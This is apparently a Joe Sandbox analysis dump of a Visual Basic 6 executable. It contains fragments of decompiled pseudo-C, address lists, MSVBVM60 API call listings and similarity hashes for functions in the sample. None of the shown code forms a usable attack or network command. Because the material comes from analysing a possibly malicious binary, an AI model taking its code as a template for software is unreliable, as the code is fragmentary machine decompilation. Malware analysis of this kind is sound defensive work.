                                                        							if(_t159 < 0) {
                                                        								L15:
                                                        								__imp____vbaErrorOverflow();
                                                        								_t197 = _t196 - 0xc;
                                                        								 *[fs:0x0] = _t197;
                                                        								_v304 = _t197 - 0x18;
                                                        								_v300 = 0x401488;
                                                        								_v296 = 0;
                                                        								_t180 = _v284;
                                                        								_t106 =  *((intOrPtr*)( *_t180 + 4))(_t180, 0, _t179, _t120,  *[fs:0x0], 0x401d26, _t186);
                                                        								_v320 = 0;
                                                        								_v324 = 0;
                                                        								__imp____vbaStrCopy();
                                                        								_t78 = _t180 + 0x70; // 0x80001
                                                        								E0040F5DC();
                                                        								_t121 = __imp____vbaSetSystemError;
                                                        								 *_t121( *_t78, 0xc6, 0, 0);
                                                        								_t108 =  &_v324;
                                                        								__imp____vbaStrToAnsi(_t108, _v320);
                                                        								_t81 = _t180 + 0x70; // 0x80001
                                                        								E0040F5DC();
                                                        								 *_t121( *_t81, 0xc2, _t106, _t108);
                                                        								_t110 =  &_v320;
                                                        								__imp____vbaStrToUnicode(_t110, _v324);
                                                        								__imp____vbaFreeStr();
                                                        								__imp____vbaFreeStr(0x417ad5);
                                                        								return _t110;
                                                        							} else {
                                                        								if(_t159 <= 0) {
                                                        									goto L12;
                                                        								} else {
                                                        									_t163 = _v40;
                                                        									_t142 = _t136 - _t103;
                                                        									if(_t142 < 0) {
                                                        										goto L15;
                                                        									} else {
                                                        										_v64 = _t142;
                                                        										_t111 = _t103 + 1;
                                                        										_push( &_v72);
                                                        										if(_t111 < 0) {
                                                        											goto L15;
                                                        										} else {
                                                        											_v72 = 3;
                                                        											__imp__#631(_t163, _t111);
                                                        											_t103 =  *_t179();
                                                        											__imp____vbaFreeVar();
                                                        											L13:
                                                        											__imp____vbaFreeStr(0x4179ed);
                                                        											return _t103;
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        					} else {
                                                        						E0040F5DC();
                                                        						 *_t169(_t153, 0xb1, _t96, _t129);
                                                        						_t113 = _v0;
                                                        						 *((intOrPtr*)( *_t113 + 8))(_t113);
                                                        						 *[fs:0x0] = _v28;
                                                        						return _v12;
                                                        					}
                                                        				} else {
                                                        					_v36 = _t126;
                                                        					_t116 = _a4;
                                                        					 *((intOrPtr*)( *_t116 + 8))(_t116);
                                                        					 *_a8 = _v36;
                                                        					 *[fs:0x0] = _v24;
                                                        					return _v8;
                                                        				}
                                                        			}













































































                                                        0x00417770
                                                        0x00417771
                                                        0x00417773
                                                        0x00417782
                                                        0x00417789
                                                        0x0041778f
                                                        0x00417792
                                                        0x0041779b
                                                        0x0041779e
                                                        0x004177a4
                                                        0x004177a7
                                                        0x004177b8
                                                        0x004177bb
                                                        0x004177be
                                                        0x004177c1
                                                        0x004177c6
                                                        0x004177d2
                                                        0x004177d4
                                                        0x00417800
                                                        0x0041780c
                                                        0x00417811
                                                        0x00417813
                                                        0x00417822
                                                        0x00417829
                                                        0x0041782f
                                                        0x00417832
                                                        0x0041783b
                                                        0x0041783e
                                                        0x00417844
                                                        0x00417847
                                                        0x00417858
                                                        0x0041785b
                                                        0x0041785e
                                                        0x00417863
                                                        0x00417869
                                                        0x0041786b
                                                        0x00417873
                                                        0x00417875
                                                        0x00417875
                                                        0x00417878
                                                        0x004178a8
                                                        0x004178b1
                                                        0x004178b3
                                                        0x004178c2
                                                        0x004178c9
                                                        0x004178cf
                                                        0x004178d2
                                                        0x004178db
                                                        0x004178de
                                                        0x004178e4
                                                        0x004178f1
                                                        0x004178f3
                                                        0x004178fd
                                                        0x00417900
                                                        0x00417903
                                                        0x00417906
                                                        0x00417909
                                                        0x0041790c
                                                        0x0041790f
                                                        0x00417914
                                                        0x00417921
                                                        0x00417929
                                                        0x00417937
                                                        0x00417937
                                                        0x00417940
                                                        0x00417949
                                                        0x0041794c
                                                        0x00417952
                                                        0x0041795a
                                                        0x004179ac
                                                        0x004179b4
                                                        0x00000000
                                                        0x0041795c
                                                        0x0041795c
                                                        0x0041795f
                                                        0x00417964
                                                        0x00417966
                                                        0x00417a14
                                                        0x00417a14
                                                        0x00417a23
                                                        0x00417a32
                                                        0x00417a3f
                                                        0x00417a42
                                                        0x00417a4b
                                                        0x00417a4e
                                                        0x00417a54
                                                        0x00417a5d
                                                        0x00417a60
                                                        0x00417a63
                                                        0x00417a69
                                                        0x00417a74
                                                        0x00417a79
                                                        0x00417a81
                                                        0x00417a86
                                                        0x00417a8b
                                                        0x00417a91
                                                        0x00417a9c
                                                        0x00417aa1
                                                        0x00417aa6
                                                        0x00417aab
                                                        0x00417ab4
                                                        0x00417ace
                                                        0x00417ad4
                                                        0x0041796c
                                                        0x0041796e
                                                        0x00000000
                                                        0x00417970
                                                        0x00417970
                                                        0x00417973
                                                        0x00417975
                                                        0x00000000
                                                        0x0041797b
                                                        0x0041797b
                                                        0x00417981
                                                        0x00417984
                                                        0x00417985
                                                        0x00000000
                                                        0x0041798b
                                                        0x0041798d
                                                        0x00417994
                                                        0x0041799f
                                                        0x004179a4
                                                        0x004179ba
                                                        0x004179e6
                                                        0x004179ec
                                                        0x004179ec
                                                        0x00417985
                                                        0x00417975
                                                        0x0041796e
                                                        0x00417966
                                                        0x0041787a
                                                        0x00417882
                                                        0x00417887
                                                        0x00417889
                                                        0x0041788f
                                                        0x0041789a
                                                        0x004178a5
                                                        0x004178a5
                                                        0x004177d6
                                                        0x004177d6
                                                        0x004177d9
                                                        0x004177df
                                                        0x004177e8
                                                        0x004177f2
                                                        0x004177fd
                                                        0x004177fd

                                                        APIs
                                                        • __vbaSetSystemError.MSVBVM60(00080001,000000B0,?,?,?,?,?,?,?,?,?,00401D26), ref: 004177C6
                                                        • __vbaErrorOverflow.MSVBVM60(?,?,?,?,?,?,?,00401D26), ref: 00417800
                                                        • __vbaSetSystemError.MSVBVM60(00080003,000000B0,?,?), ref: 00417869
                                                        • __vbaSetSystemError.MSVBVM60(00080003,000000B1,?,?), ref: 00417887
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: Error__vba$System$Overflow
                                                        • String ID:
                                                        • API String ID: 868049110-0
                                                        • Opcode ID: b4208f3309b515724842a22f0efa278b354388a228e95db4bbe2ddab71d78020
                                                        • Instruction ID: ef7cf49ab0a65f07306b2dc3c61cb2db9c88e639ada1fd06a3bad6ff06cd6ac4
                                                        • Opcode Fuzzy Hash: b4208f3309b515724842a22f0efa278b354388a228e95db4bbe2ddab71d78020
                                                        • Instruction Fuzzy Hash: 61A13E75D00209AFDB14DFA9D945AEEFBB8FF88700F10802AE915B3660D778A945CF64
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041D0B5
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004110D8,000000D8), ref: 0041D0DC
                                                        • __vbaVarForInit.MSVBVM60(?,?,?,?,?,00000002), ref: 0041D120
                                                        • __vbaFreeObj.MSVBVM60 ref: 0041D12B
                                                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041D147
                                                        • __vbaI2Var.MSVBVM60(?,?), ref: 0041D159
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004110D8,00000138), ref: 0041D17B
                                                        • __vbaFreeObj.MSVBVM60 ref: 0041D187
                                                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041D1A0
                                                        • __vbaI2Var.MSVBVM60(?,?), ref: 0041D1B2
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004110D8,000000E8), ref: 0041D1D4
                                                        • __vbaFreeObj.MSVBVM60(00401760,?), ref: 0041D1FA
                                                        • __vbaFreeVar.MSVBVM60 ref: 0041D203
                                                        • __vbaVarForNext.MSVBVM60(?,?,?), ref: 0041D21B
                                                        • __vbaFreeVarList.MSVBVM60(00000002,?,?,0041D27A), ref: 0041D267
                                                        • __vbaFreeVar.MSVBVM60 ref: 0041D273
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$Free$CheckHresult$InitListNext
                                                        • String ID:
                                                        • API String ID: 3182110704-0
                                                        • Opcode ID: e7e8942c6e4d492981a24d2389e3e02bb8081b39ec8293a625fea194fc897eae
                                                        • Instruction ID: 6a85e27ae920267f53d5d76ba3e1e7c53119c4ca6f97be34d9284739ec19b9b4
                                                        • Opcode Fuzzy Hash: e7e8942c6e4d492981a24d2389e3e02bb8081b39ec8293a625fea194fc897eae
                                                        • Instruction Fuzzy Hash: 848109B1D00209EFCB10DFA5D988ADEBBB8FF48701F10856AE546B7250DB345A89CF64
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • #593.MSVBVM60(?), ref: 0041C95D
                                                        • __vbaFPInt.MSVBVM60 ref: 0041C973
                                                        • __vbaVarMove.MSVBVM60 ref: 0041C98F
                                                        • __vbaFreeVar.MSVBVM60 ref: 0041C998
                                                        • __vbaStrCopy.MSVBVM60 ref: 0041C9A6
                                                        • __vbaVarForInit.MSVBVM60(?,?,?,00000004,?,?), ref: 0041C9E5
                                                        • #593.MSVBVM60(0000000A), ref: 0041CA21
                                                        • __vbaFPInt.MSVBVM60 ref: 0041CA37
                                                        • __vbaFpI4.MSVBVM60 ref: 0041CA4D
                                                        • #608.MSVBVM60(?,00000000), ref: 0041CA58
                                                        • __vbaVarCat.MSVBVM60(?,?,00000008), ref: 0041CA6D
                                                        • __vbaStrVarMove.MSVBVM60(00000000), ref: 0041CA74
                                                        • __vbaStrMove.MSVBVM60 ref: 0041CA7B
                                                        • __vbaFreeVarList.MSVBVM60(00000003,0000000A,?,?), ref: 0041CA8B
                                                        • __vbaVarForNext.MSVBVM60(?,?,?), ref: 0041CAA6
                                                        • __vbaFreeVar.MSVBVM60(0000000A,00401700,?), ref: 0041CAD5
                                                        • __vbaFreeVarList.MSVBVM60(00000002,?,?,0041CB3A), ref: 0041CB17
                                                        • __vbaFreeVar.MSVBVM60 ref: 0041CB29
                                                        • __vbaFreeStr.MSVBVM60 ref: 0041CB2E
                                                        • __vbaFreeVar.MSVBVM60 ref: 0041CB37
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$Free$Move$#593List$#608CopyInitNext
                                                        • String ID:
                                                        • API String ID: 4148204782-0
                                                        • Opcode ID: e0988d56768810e98dd338c59231a28b6df2efc98b64c1d13d84d6347c178d24
                                                        • Instruction ID: 5f35ebb9a6637d0c404a355b193f0a4585f7776cb073dbf18c79494bb6df7b5d
                                                        • Opcode Fuzzy Hash: e0988d56768810e98dd338c59231a28b6df2efc98b64c1d13d84d6347c178d24
                                                        • Instruction Fuzzy Hash: 7E613BB1800219DFDB10DF94DD84ADDBB78FF48704F14816AE549B7260DB746A8ACFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __vbaStrCopy.MSVBVM60(00000001,00000000,72A26C30), ref: 0042423F
                                                        • __vbaStrCopy.MSVBVM60 ref: 00424247
                                                        • __vbaStrCat.MSVBVM60(00411B14,?,?,00000001), ref: 00424258
                                                        • __vbaStrMove.MSVBVM60 ref: 00424269
                                                        • __vbaInStr.MSVBVM60(00000000,00000000), ref: 0042426D
                                                        • __vbaFreeStr.MSVBVM60 ref: 0042427B
                                                        • __vbaLenBstr.MSVBVM60(?), ref: 0042428D
                                                        • #631.MSVBVM60(?,-00000002,?,00000001), ref: 004242C2
                                                        • __vbaStrMove.MSVBVM60 ref: 004242CD
                                                        • #537.MSVBVM60(00000022,00000000), ref: 004242D2
                                                        • __vbaStrMove.MSVBVM60 ref: 004242DD
                                                        • __vbaInStr.MSVBVM60(00000000,00000000), ref: 004242E1
                                                        • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 004242FD
                                                        • __vbaFreeVar.MSVBVM60 ref: 00424309
                                                        • #631.MSVBVM60(?,-00000002,?), ref: 0042432A
                                                        • __vbaStrMove.MSVBVM60 ref: 00424335
                                                        • __vbaFreeStr.MSVBVM60(0042437B), ref: 00424373
                                                        • __vbaFreeStr.MSVBVM60 ref: 00424378
                                                        • __vbaErrorOverflow.MSVBVM60 ref: 00424391
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$Free$Move$#631Copy$#537BstrErrorListOverflow
                                                        • String ID:
                                                        • API String ID: 2145999145-0
                                                        • Opcode ID: 869c94eff4719d3445c7680111563ec1679fe1b2f49b43f7d9d87f13be040cf3
                                                        • Instruction ID: 7b8e4d17f200f24905ac9b7e6a1c082584fd9c0793d708d482427f1cd895d236
                                                        • Opcode Fuzzy Hash: 869c94eff4719d3445c7680111563ec1679fe1b2f49b43f7d9d87f13be040cf3
                                                        • Instruction Fuzzy Hash: 69411DB5D00259EFCB14DFA4ED859EEBBB8FB48300F50412AE905B7260DB745945CFA8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __vbaNew2.MSVBVM60(004104D8,0042AA34,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 004267FE
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,027EF774,004104C8,00000014), ref: 00426823
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004104E8,00000050), ref: 00426847
                                                        • __vbaStrCat.MSVBVM60(\Sounds\Click.wav,?,00000000,00000001), ref: 00426859
                                                        • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00426864
                                                        • __vbaStrToAnsi.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0042686F
                                                        • __vbaSetSystemError.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0042687B
                                                        • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0042688F
                                                        • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0042689B
                                                        • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 004268B5
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00412014,0000005C), ref: 004268D0
                                                        • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 004268D9
                                                        • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 004268ED
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00412014,0000005C), ref: 00426908
                                                        • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00426911
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$CheckFreeHresult$AnsiErrorListMoveNew2System
                                                        • String ID: \Sounds\Click.wav
                                                        • API String ID: 2740840597-1585840535
                                                        • Opcode ID: f857b64f014cd668101273eff1111e7c3b7434942030b36ba6878eb5fcc1e8fe
                                                        • Instruction ID: 2cc060864ead10da6dbf65f829a6bb4656d60626cb2d236470b8b610472c64ed
                                                        • Opcode Fuzzy Hash: f857b64f014cd668101273eff1111e7c3b7434942030b36ba6878eb5fcc1e8fe
                                                        • Instruction Fuzzy Hash: BB415571A00215AFDB109FA4DE89EEE7BB8FF09705F204169F601F71A0D7785945CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __vbaNew2.MSVBVM60(0040B730,?,00000000,?,72A1A274), ref: 0041DE8C
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,0000001C), ref: 0041DEB0
                                                        • __vbaFreeVar.MSVBVM60 ref: 0041DEB9
                                                        • __vbaNew2.MSVBVM60(0040B730,?), ref: 0041DED2
                                                        • __vbaNew2.MSVBVM60(0040B730,?), ref: 0041DEE6
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,72A1A237,00411158,00000020), ref: 0041DF09
                                                        • __vbaFreeVar.MSVBVM60 ref: 0041DF12
                                                        • __vbaNew2.MSVBVM60(0040B730,?), ref: 0041DF22
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,72A1A237,00411158,00000024), ref: 0041DF43
                                                        • __vbaObjSetAddref.MSVBVM60(?,?), ref: 0041DF4E
                                                        • __vbaFreeObj.MSVBVM60 ref: 0041DF57
                                                        • __vbaNew2.MSVBVM60(0040B730,?), ref: 0041DF6A
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,00000028), ref: 0041DF8B
                                                        • __vbaVarTextTstEq.MSVBVM60(?,?), ref: 0041DF9C
                                                        • __vbaFreeVar.MSVBVM60 ref: 0041DFA7
                                                        • __vbaNew2.MSVBVM60(0040B730,?), ref: 0041DFBC
                                                        • __vbaObjSetAddref.MSVBVM60(?,00000000), ref: 0041DFC9
                                                        • __vbaFreeObj.MSVBVM60(0041E00C), ref: 0041E005
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$New2$Free$CheckHresult$Addref$Text
                                                        • String ID:
                                                        • API String ID: 2851631601-0
                                                        • Opcode ID: 3f32f0f8c3371e7541b1ce9ea75cff5f4fb04cdc1715be45626221a2d6cc9bca
                                                        • Instruction ID: 5e1d30c90b861ca7848139087fe7dc1a9eb11ad966b48f2339337a312027fb64
                                                        • Opcode Fuzzy Hash: 3f32f0f8c3371e7541b1ce9ea75cff5f4fb04cdc1715be45626221a2d6cc9bca
                                                        • Instruction Fuzzy Hash: 965163B0900249AFCB14DF95DD89DDEBB78FF58705B208429F641B72A0D7749889CFA8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __vbaVarMove.MSVBVM60 ref: 0041841C
                                                        • #525.MSVBVM60(-00007FFE), ref: 00418453
                                                        • __vbaStrMove.MSVBVM60 ref: 0041845E
                                                        • __vbaStrToAnsi.MSVBVM60(?,?), ref: 0041846C
                                                        • __vbaSetSystemError.MSVBVM60(0041889E,0000000D,-00007FFE,00000000), ref: 00418481
                                                        • __vbaStrToUnicode.MSVBVM60(?,?), ref: 0041848F
                                                        • __vbaFreeStr.MSVBVM60 ref: 0041849E
                                                        • __vbaStrCopy.MSVBVM60 ref: 004184AA
                                                        • __vbaFreeVar.MSVBVM60(004184E3), ref: 004184D3
                                                        • __vbaFreeStr.MSVBVM60 ref: 004184DC
                                                        • __vbaErrorOverflow.MSVBVM60 ref: 00418500
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00401528,0040F430,000002B0), ref: 00418577
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410678,0000003C), ref: 0041859B
                                                        • __vbaFreeObj.MSVBVM60 ref: 004185A7
                                                        • __vbaStrCopy.MSVBVM60 ref: 004185C5
                                                        • __vbaFreeStr.MSVBVM60 ref: 004185CE
                                                        • __vbaStrCopy.MSVBVM60 ref: 004185DA
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$Free$Copy$CheckErrorHresultMove$#525AnsiOverflowSystemUnicode
                                                        • String ID:
                                                        • API String ID: 727747846-0
                                                        • Opcode ID: 657152c05121c586db5327124a442754050677307aae7951800f8b752932e4e9
                                                        • Instruction ID: f487ac9f09a99370c070d56df0fb01880138e9f754481dcb7e66e7c1ad1910b5
                                                        • Opcode Fuzzy Hash: 657152c05121c586db5327124a442754050677307aae7951800f8b752932e4e9
                                                        • Instruction Fuzzy Hash: EA518375900219EFCB14DFA4DA88AEEBBB8FF08700F104529F506B7260DB786946CF94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __vbaObjSetAddref.MSVBVM60(?,?), ref: 00415347
                                                        • __vbaObjIs.MSVBVM60(?,00000000), ref: 0041534E
                                                        • __vbaCastObj.MSVBVM60(?,00410468), ref: 0041536B
                                                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 00415376
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410468,0000004C), ref: 0041539B
                                                        • __vbaSetSystemError.MSVBVM60(00080007,00000030,?,00000001), ref: 004153B2
                                                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 004153C6
                                                        • __vbaObjSetAddref.MSVBVM60(?,?), ref: 004153DB
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,00000214), ref: 004153FA
                                                        • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0041540A
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,004012D0,0040F430,00000390), ref: 00415449
                                                        • __vbaFreeObj.MSVBVM60(0041547B), ref: 00415473
                                                        • __vbaFreeObj.MSVBVM60 ref: 00415478
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$CheckFreeHresult$Addref$CastErrorListSystem
                                                        • String ID: Font
                                                        • API String ID: 3738871781-1889970156
                                                        • Opcode ID: 0722a3743ff76973780773f3fea71a056cfd66d1a76cb4db333142056a77aa4f
                                                        • Instruction ID: 6bc4be87af2c07027715a9e2a2bd91cfb8959c292c7f498c447615085812a062
                                                        • Opcode Fuzzy Hash: 0722a3743ff76973780773f3fea71a056cfd66d1a76cb4db333142056a77aa4f
                                                        • Instruction Fuzzy Hash: 56412070900209AFCB04DF95D989EEEBBB8FF98701F10811AF545E7260D774A985CF64
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __vbaStrCopy.MSVBVM60 ref: 00421108
                                                        • __vbaNew.MSVBVM60(0040BC04), ref: 00421118
                                                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 00421123
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004113E8,00000020), ref: 00421148
                                                        • __vbaObjSetAddref.MSVBVM60(?,?), ref: 00421178
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00411580,00000020), ref: 004211B2
                                                        • __vbaCastObj.MSVBVM60(?,004113E8), ref: 004211C1
                                                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 004211CC
                                                        • __vbaFreeObj.MSVBVM60 ref: 004211D5
                                                        • __vbaFreeVarList.MSVBVM60(00000003,?,?,?), ref: 004211E9
                                                        • __vbaObjSetAddref.MSVBVM60(?,?), ref: 004211FA
                                                        • __vbaFreeObj.MSVBVM60(00421246), ref: 00421236
                                                        • __vbaFreeStr.MSVBVM60 ref: 0042123F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$Free$AddrefCheckHresult$CastCopyList
                                                        • String ID: @
                                                        • API String ID: 4087540898-3871860774
                                                        • Opcode ID: 18d870e09c087d0de79326df0e36169bb7a567c4605603b1e849ecc6936ad90e
                                                        • Instruction ID: b2c52fb0ff59e548289ddadc2256cc9f5d7e743dd723f6642b544e9356a26b3e
                                                        • Opcode Fuzzy Hash: 18d870e09c087d0de79326df0e36169bb7a567c4605603b1e849ecc6936ad90e
                                                        • Instruction Fuzzy Hash: D941F9B1D00209AFDB04DF95DA85AEEBBB8FF58700F20411AE616B72A0D7746A05CF64
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __vbaStrCat.MSVBVM60(004117A4,<area,?,?,?,?,?,?,?,?,00401D26), ref: 004201D5
                                                        • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,00401D26), ref: 004201E2
                                                        • __vbaStrCat.MSVBVM60(0040F42C,00000000,?,?,?,?,?,?,?,?,00401D26), ref: 004201EA
                                                        • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,00401D26), ref: 004201F1
                                                        • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,00401D26), ref: 004201F6
